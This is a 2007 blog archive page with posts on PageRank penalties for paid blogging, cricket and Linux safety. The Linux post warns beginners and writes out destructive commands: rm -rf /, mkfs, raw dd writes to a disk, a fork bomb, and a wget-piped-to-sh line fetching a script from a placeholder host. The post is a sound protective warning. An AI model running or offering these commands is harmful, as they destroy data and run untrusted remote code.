Archive for November, 2007

Bloggerwave Cares

November 30th, 2007 by Naman Bagga | 4 Comments | Filed in Blogging

Recently Google has started penalizing Bloggers and Advertisers for using services like PayPerPost by resetting their Page Ranks to 0.Google says that such services disturb their Page Rank system and the page-rank of the advertiser's website is increased artificially.Different websites are reacting differently to this act by Google.

PayPerPost Izea has come up with a new traffic based ranking system called RealRank.PPP also has provided a one-click option to Advertisers if they wish to allow a "nofollow" tag.But the only service which will benefit from this incident is Google AdSense.

Another such website,Bloggerwave cares for it's members.I've made many posts on Bloggerwave and you can read those later by having a look at my archives.Bloggerwave has added rel="nofollow" to all its links.I would advise you to update all your posts and add rel="nofollow" to all links.

I would also advise you to delete old PPP posts or add a nofollow tag to them.

I’m Mobile

November 28th, 2007 by Naman Bagga | No Comments | Filed in Blogging, General, MobiWorld

This post is special as it is the first post I've published using my mobile phone-Motorola SLVR L9

A Tribute To Misbah

November 25th, 2007 by Naman Bagga | No Comments | Filed in Cricket, Humour, Videos

Pakistan newcomer,Misbah-ul-Haq has a habbit of getting out in the most funniest possible manner.Here's a post dedicated to his dismissals.

In the ICC World Twenty20 Finals,he managed to get himself out by playing a silly shot when Pakistan were in a very comfortble position and could have won easily.Here's what he managed to do-

When asked about the shot he played in the ICC World T20 final,he said in an interview that he would play the shot agian.In the 2nd ODI against India he dared to play the same shot and this time things were a bit different.He didn't manage to hit the ball and was bowled.Have a look-

Recently,in the first test between India and Pakistan at Delhi,he got run out in a really funny manner.He jumped to let the ball hit the stumps while he was in the air.You definitely need to look at this video-


Some Dangerous Commands

November 23rd, 2007 by Naman Bagga | 1 Comment | Filed in Linux

This post is to warn all noobs.If you don't know what a noob is,perhaps you might be one.Noob is short for newbie.If you want a complete post dedicated to explaining noobs, visit Vivek's Blog(The Tech Nut).

In one of my recent posts,I had linked back to some good Linux forums like LQ and Ubuntu Forums and had asked you to visit these forums for some additional help.But all people are not as helpful as I am.There are a few spammers misguiding people who ask questions on the forums.Although such spammers are banned from the forums,you might come across one someday.

Ubuntu is one of the most user friendly Linux Distros.You will rarely need to use terminal.However Linux Pros like using the terminal and even noobs find it fascinating to use a command line.So here are a few commands with their description which is explanatory of the fact that they are dangerous.

The following are statements which recursively delete files-

rm -rf /
rm -rf .
rm -rf *

These three statements are to delete all files,delete current directory and delete visible files in current directory respectively.

mkfs is a command used to format a partition.Thus these commands should never be executed -

mkfs
mkfs.ext3
mkfs.anything

I would recommend you to use a GUI to format partitions if you ever need to do so.

Another hazardous thing you can do with the terminal is 'Block device manipulation'.It causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data.This is what the command will look like-

any_command > /dev/sda
dd if=something of=/dev/sda

Some spammers make you trigger a Forkbomb.In other words it executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.In Bourne-ish shells, like Bash,it looks like-

:( ){:|:};:

and in Perl-

fork while fork

I would like to remind you that all these commands should NOT be executed.
You should take preventive measures to combat Tarbombs and Decompression bombs.Always extract archives in a new folder and don't download archives from untrusted sources.

Don't execute all shellscripts given to you.It may contain a malicious command.This is what the code will look like-

wget http://some_place/some_file
sh ./some_file

Which is same as writing-

wget http://some_place/some_file -O- | sh

The list of hazards is endless.Someone might ask you to compile some code.This can be a good way to hide the commands he wants you to execute.Thus the best way to be safe is to understand the commands you execute.If you feel that your problem is not related to the command you are being told to execute,be cautious and ask for help from other sources.

Navigation »
Subscribe RSS

Canonical URL by SEO No Duplicate WordPress Plugin